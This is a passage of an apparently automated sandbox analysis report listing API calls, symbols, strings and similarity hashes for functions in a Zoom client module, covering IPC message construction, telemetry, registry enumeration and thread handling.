                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.settingssynctopt.request,00009E8C,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C721C5
                  • Part of subcall function 00C7A420: __EH_prolog3.LIBCMT ref: 00C7A427
                  • Part of subcall function 00C7A420: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C721CA,com.zoom.app.cci.ccivideo.settingssynctopt.request,00009E8C,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C7A443
                  • Part of subcall function 00C92963: __EH_prolog3_GS.LIBCMT ref: 00C9296A
                  • Part of subcall function 00C92963: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C92984
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C929B2
                  • Part of subcall function 00C92963: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,?), ref: 00C929EF
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,-00000004,-00000004,?), ref: 00C92A1F
                  • Part of subcall function 00C92963: EnterCriticalSection.KERNEL32(?), ref: 00C92AB1
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: com.zoom.app.cci.ccivideo.settingssynctopt.request$device_id$device_name$is_enable$level$req_type
                • API String ID: 1769764177-966122582
                • Opcode ID: b8af46c9a8d84216382a9f3db49ebb1b793b401a8b49ffa4319eb09a33205c83
                • Instruction ID: 911f81ba76b68db26066569a1049a10bfc05d536be42aeecc12bfb7ed9c4a458
                • Opcode Fuzzy Hash: b8af46c9a8d84216382a9f3db49ebb1b793b401a8b49ffa4319eb09a33205c83
                • Instruction Fuzzy Hash: ADF06571B803517BD7107B55AC06B2E66A06760F15F51C16CB1546A2D1CBF88904DBB9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C722B7
                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.settingssyncfrompt.request,00009E8D,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C722E5
                  • Part of subcall function 00C7A420: __EH_prolog3.LIBCMT ref: 00C7A427
                  • Part of subcall function 00C7A420: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C721CA,com.zoom.app.cci.ccivideo.settingssynctopt.request,00009E8C,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C7A443
                  • Part of subcall function 00C92963: __EH_prolog3_GS.LIBCMT ref: 00C9296A
                  • Part of subcall function 00C92963: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C92984
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C929B2
                  • Part of subcall function 00C92963: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,?), ref: 00C929EF
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,-00000004,-00000004,?), ref: 00C92A1F
                  • Part of subcall function 00C92963: EnterCriticalSection.KERNEL32(?), ref: 00C92AB1
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: com.zoom.app.cci.ccivideo.settingssyncfrompt.request$device_id$device_name$is_enable$level$req_type
                • API String ID: 1769764177-2160034841
                • Opcode ID: d1ab7139d2b5ee1f73e401bb71ed7b75eef99670c1fd6c53c3482d7258b3915a
                • Instruction ID: 4fa2874d1e630a9a3b62fab749e98101f6bcca244345968dd9ab8eb112b81cef
                • Opcode Fuzzy Hash: d1ab7139d2b5ee1f73e401bb71ed7b75eef99670c1fd6c53c3482d7258b3915a
                • Instruction Fuzzy Hash: DDF065B1B803507BC710BB54AC0BB2E26A06760F15F55C628F5446A2D1CBF88944D676
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C357
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IIIH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.pt.mediaapi.request,00002749,requestID,req_type,timeout_seconds,mode,check_audio_device,00000004), ref: 00C6C384
                  • Part of subcall function 00C7C290: __EH_prolog3.LIBCMT ref: 00C7C297
                  • Part of subcall function 00C7C290: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@III@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6C389,com.Zoom.app.pt.mediaapi.request,00002749,requestID,req_type,timeout_seconds,mode,check_audio_device,00000004), ref: 00C7C2B3
                  • Part of subcall function 00C8C233: __EH_prolog3_GS.LIBCMT ref: 00C8C23A
                  • Part of subcall function 00C8C233: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C3B0), ref: 00C8C24E
                  • Part of subcall function 00C8C233: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,00000044,00C6C3B0), ref: 00C8C280
                  • Part of subcall function 00C8C233: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2BD
                  • Part of subcall function 00C8C233: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2EF
                  • Part of subcall function 00C8C233: EnterCriticalSection.KERNEL32(?), ref: 00C8C381
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: check_audio_device$com.Zoom.app.pt.mediaapi.request$mode$req_type$requestID$timeout_seconds
                • API String ID: 3008810952-1181956020
                • Opcode ID: 54780035f9784bd3c373dc4fabdc517b384545fdbd1f63ee3c40ef860e3e3b48
                • Instruction ID: 28604725b4bdd3e1d70cea1a2e69fc3607459d96d32b681c0e827096505b65f0
                • Opcode Fuzzy Hash: 54780035f9784bd3c373dc4fabdc517b384545fdbd1f63ee3c40ef860e3e3b48
                • Instruction Fuzzy Hash: 0FE02B70A803C0BED71177949C4775D73609B20B1AF50812CB5006A2D2CBF4450CC6B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C764C7
                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@_K@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.cdnEventIndication,0000279A,evtType,msgTb,evtInfo,meetingID,meetingNum,00000004), ref: 00C764F4
                  • Part of subcall function 00C789A0: __EH_prolog3.LIBCMT ref: 00C789A7
                  • Part of subcall function 00C789A0: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C764F9,com.zoom.app.cdnEventIndication,0000279A,evtType,msgTb,evtInfo,meetingID,meetingNum,00000004), ref: 00C789C3
                  • Part of subcall function 00C95AF0: __EH_prolog3_GS.LIBCMT ref: 00C95AF7
                  • Part of subcall function 00C95AF0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76520), ref: 00C95B0B
                  • Part of subcall function 00C95AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cdnEventIndication,00000044,00C76520), ref: 00C95B3D
                  • Part of subcall function 00C95AF0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.cdnEventIndication), ref: 00C95B7A
                  • Part of subcall function 00C95AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cdnEventIndication,-00000004,-00000004,com.zoom.app.cdnEventIndication), ref: 00C95BAC
                  • Part of subcall function 00C95AF0: EnterCriticalSection.KERNEL32(?), ref: 00C95C3E
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@TreeV12@@V12@_
                • String ID: com.zoom.app.cdnEventIndication$evtInfo$evtType$meetingID$meetingNum$msgTb
                • API String ID: 952373449-4147567900
                • Opcode ID: f9c09f7f1b50b41cf732b39b69e316a14461a676061ec57f8b66404ccace40e2
                • Instruction ID: 8ec30675a39540026067eafa5907899b453017a7e1c975f7ae11e6e7936cbce4
                • Opcode Fuzzy Hash: f9c09f7f1b50b41cf732b39b69e316a14461a676061ec57f8b66404ccace40e2
                • Instruction Fuzzy Hash: 03E065F0BC4B447ED750BB98DC8B71D65A0A715F15F90856CB104B92C2CAF40548D779
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E6D7
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.load.service.request,00009DD0,roomName,roomUUID,d_microphone,rxChannelCounts,txChannelCounts,00000004), ref: 00C6E704
                  • Part of subcall function 00C7B8E0: __EH_prolog3.LIBCMT ref: 00C7B8E7
                  • Part of subcall function 00C7B8E0: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E709,com.zoom.app.assistant.virtualaudio.message.load.service.request,00009DD0,roomName,roomUUID,d_microphone,rxChannelCounts,txChannelCounts,00000004), ref: 00C7B903
                  • Part of subcall function 00C8E763: __EH_prolog3_GS.LIBCMT ref: 00C8E76A
                  • Part of subcall function 00C8E763: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6E730), ref: 00C8E77E
                  • Part of subcall function 00C8E763: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,00000044,00C6E730), ref: 00C8E7B0
                  • Part of subcall function 00C8E763: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E7ED
                  • Part of subcall function 00C8E763: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E81F
                  • Part of subcall function 00C8E763: EnterCriticalSection.KERNEL32(?), ref: 00C8E8B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.load.service.request$d_microphone$roomName$roomUUID$rxChannelCounts$txChannelCounts
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A867
                • ??0?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyStartRecording,00002732,MeetingNo,MeetingTopic,Path,FilePrefix,RecordOption,00000004), ref: 00C6A894
                  • Part of subcall function 00C7D4B0: __EH_prolog3.LIBCMT ref: 00C7D4B7
                  • Part of subcall function 00C7D4B0: ??0?$CmmMessageTemplate_4@_JV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6A899,com.Zoom.app.conf.notifyStartRecording,00002732,MeetingNo,MeetingTopic,Path,FilePrefix,RecordOption,00000004), ref: 00C7D4D3
                  • Part of subcall function 00C89977: __EH_prolog3_GS.LIBCMT ref: 00C8997E
                  • Part of subcall function 00C89977: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6A8C0), ref: 00C89992
                  • Part of subcall function 00C89977: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyStartRecording,00000044,00C6A8C0), ref: 00C899C4
                  • Part of subcall function 00C89977: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.notifyStartRecording), ref: 00C89A01
                  • Part of subcall function 00C89977: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyStartRecording,-00000004,-00000004,com.Zoom.app.conf.notifyStartRecording), ref: 00C89A33
                  • Part of subcall function 00C89977: EnterCriticalSection.KERNEL32(?), ref: 00C89AC5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@_Template_5@_TreeV12@@
                • String ID: FilePrefix$MeetingNo$MeetingTopic$Path$RecordOption$com.Zoom.app.conf.notifyStartRecording
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CBF7
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HHV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.onRegistrar.notification,00009CA7,LineId,Status,RespCode,RespDescription,CodeDetail,00000004), ref: 00C6CC24
                  • Part of subcall function 00C7BE70: __EH_prolog3.LIBCMT ref: 00C7BE77
                  • Part of subcall function 00C7BE70: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6CC29,com.zoom.app.assistant.sip.onRegistrar.notification,00009CA7,LineId,Status,RespCode,RespDescription,CodeDetail,00000004), ref: 00C7BE93
                  • Part of subcall function 00C8CE80: __EH_prolog3_GS.LIBCMT ref: 00C8CE87
                  • Part of subcall function 00C8CE80: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CC50), ref: 00C8CE9B
                  • Part of subcall function 00C8CE80: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,00000044,00C6CC50), ref: 00C8CECD
                  • Part of subcall function 00C8CE80: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF0A
                  • Part of subcall function 00C8CE80: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF3C
                  • Part of subcall function 00C8CE80: EnterCriticalSection.KERNEL32(?), ref: 00C8CFCE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@TreeV12@
                • String ID: CodeDetail$LineId$RespCode$RespDescription$Status$com.zoom.app.assistant.sip.onRegistrar.notification
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68B17
                • ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.conf.plistChanged,00002720,MeetingID,cmd,userFBID,userDeviceID,screenName,00000004), ref: 00C68B44
                  • Part of subcall function 00C7F6A0: __EH_prolog3.LIBCMT ref: 00C7F6A7
                  • Part of subcall function 00C7F6A0: ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C68B49,com.Zoom.app.conf.plistChanged,00002720,MeetingID,cmd,userFBID,userDeviceID,screenName,00000004), ref: 00C7F6C3
                  • Part of subcall function 00C86AF0: __EH_prolog3_GS.LIBCMT ref: 00C86AF7
                  • Part of subcall function 00C86AF0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68B70), ref: 00C86B0B
                  • Part of subcall function 00C86AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,00000044,00C68B70), ref: 00C86B3D
                  • Part of subcall function 00C86AF0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86B7A
                  • Part of subcall function 00C86AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86BAC
                  • Part of subcall function 00C86AF0: EnterCriticalSection.KERNEL32(?), ref: 00C86C3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@V12@@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: MeetingID$cmd$com.Zoom.app.conf.plistChanged$screenName$userDeviceID$userFBID
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68C97
                • ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@IH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.meeting.update.disclaimer.status,0000275C,MyScreenName,MeetingNumber,MeetingID,Type,Agree,00000004), ref: 00C68CC4
                  • Part of subcall function 00C7F5B0: __EH_prolog3.LIBCMT ref: 00C7F5B7
                  • Part of subcall function 00C7F5B0: ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C68CC9,com.Zoom.app.meeting.update.disclaimer.status,0000275C,MyScreenName,MeetingNumber,MeetingID,Type,Agree,00000004), ref: 00C7F5D3
                  • Part of subcall function 00C86D43: __EH_prolog3_GS.LIBCMT ref: 00C86D4A
                  • Part of subcall function 00C86D43: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68CF0), ref: 00C86D5E
                  • Part of subcall function 00C86D43: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,00000044,00C68CF0), ref: 00C86D90
                  • Part of subcall function 00C86D43: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DCD
                  • Part of subcall function 00C86D43: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DFF
                  • Part of subcall function 00C86D43: EnterCriticalSection.KERNEL32(?), ref: 00C86E91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: Agree$MeetingID$MeetingNumber$MyScreenName$Type$com.Zoom.app.meeting.update.disclaimer.status
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB6CC5
                • ?UIntToString@Cmm@@YAXIAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(00000000,00D33368,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6D1E
                  • Part of subcall function 00C644A0: __cftof.LIBCMT ref: 00C644CC
                  • Part of subcall function 00C644A0: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00C644DA
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@PB_W@Z.RWSNDPQSKZ(?,00D3D264,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6D34
                  • Part of subcall function 00C54320: __EH_prolog3_GS.LIBCMT ref: 00C54327
                  • Part of subcall function 00C54320: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C54339
                  • Part of subcall function 00C54320: ??Y?$CStringT@_W@Cmm@@QAEAAV01@PB_W@Z.RWSNDPQSKZ(?,?,00000024), ref: 00C54345
                  • Part of subcall function 00C54320: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,?,00000024), ref: 00C5434D
                • ??H?$CStringT@_W@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,00000008,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6D44
                  • Part of subcall function 00C542C0: __EH_prolog3_GS.LIBCMT ref: 00C542C7
                  • Part of subcall function 00C542C0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C542D9
                  • Part of subcall function 00C542C0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,00000000,?,00000024), ref: 00C542F3
                • ?SetBasicMetricsInfo@CCmmPerfTelemetry@@CAXAAUZClientPerfMetricsInfo_s@ZoomPTPAAP@@_K@Z.RWSNDPQSKZ(?,?,?,0000036C,00CB5844,?,?,?,?,?,?,?,?,?,00000000,00000008), ref: 00CB6E1E
                • __aulldiv.LIBCMT ref: 00CB6F7D
                • ?SetMetricsInfoAttribs@CCmmPerfTelemetry@@CAXAAUZClientPerfMetricsInfo_s@ZoomPTPAAP@@AAUPerfTelemetryStartEntry@1@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,00000000,?,?,00000000,00000008), ref: 00CB702A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@String$PerfV01@@$??0?$Metrics$H_prolog3_V01@$ClientInfo_s@Telemetry@@Zoom$Assign@?$Attribs@BasicEntry@1@@InfoInfo@P@@_StartString@TelemetryW@1@@__aulldiv__cftof
                • String ID:
                APIs
                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,?,?,?,00000118,?,?), ref: 00CD47B9
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000C7,00000000,00000000,00000000,00000000), ref: 00CD47F6
                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 00CD4871
                • RegGetValueW.ADVAPI32(00000000,00000000,?,0000FFFF,?,?,00000F9E), ref: 00CD48D4
                • RegCloseKey.ADVAPI32(?), ref: 00CD48E2
                • PathIsRelativeW.SHLWAPI(?), ref: 00CD4926
                • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00CD4942
                • RegEnumKeyExW.ADVAPI32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,00000118), ref: 00CD4986
                • RegCloseKey.ADVAPI32(?,?,?,?,00000118,?,?), ref: 00CD49A0
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: CloseEnumOpen$LibraryLoadPathRelativeValue
                • String ID:
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: _free
                • String ID:
                APIs
                • CreateThread.KERNEL32(00000000,00000000,00CE0460,?,00000000,00000000), ref: 00CE03B9
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CE03C8
                • CloseHandle.KERNEL32(00000000), ref: 00CE03CF
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE03D7
                • TerminateProcess.KERNEL32(00000000), ref: 00CE03DE
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE03EF
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0437
                • TerminateProcess.KERNEL32(00000000), ref: 00CE043E
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE0445
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Process$CriticalCurrentSectionTerminate$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                • String ID:
                APIs
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00CB8A23
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA1761
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA178E
                • WaitForSingleObject.KERNEL32(?,000493E0), ref: 00CB8A3E
                • ?DoConsumeEvents@CCmmPerfTelemetry@@SAXXZ.RWSNDPQSKZ ref: 00CB8A4F
                  • Part of subcall function 00CB7AC0: __EH_prolog3.LIBCMT ref: 00CB7AC7
                  • Part of subcall function 00CB7AC0: EnterCriticalSection.KERNEL32(00DFFB3C,00000024), ref: 00CB7AD2
                  • Part of subcall function 00CB7AC0: LeaveCriticalSection.KERNEL32(00DFFB3C), ref: 00CB7AE7
                • EnterCriticalSection.KERNEL32(?), ref: 00CB8A5B
                • LeaveCriticalSection.KERNEL32(?), ref: 00CB8A76
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00CB8A81
                • ?DoSendEvents@CCmmPerfTelemetry@@SAXXZ.RWSNDPQSKZ ref: 00CB8AB2
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00CB8ABC
                • ResetEvent.KERNEL32(?), ref: 00CB8AD5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@Now@V12@$CriticalSection$Time@$EnterEvents@LeavePerfTelemetry@@Ticks@Time$ConsumeEventH_prolog3ObjectResetSendSingleWait
                • String ID:
                • API String ID: 924306438-0
                • Opcode ID: fdf2438b5b92ff1521ba969def3c184e31f34b5c8cb02d3d13921d3bae2bb001
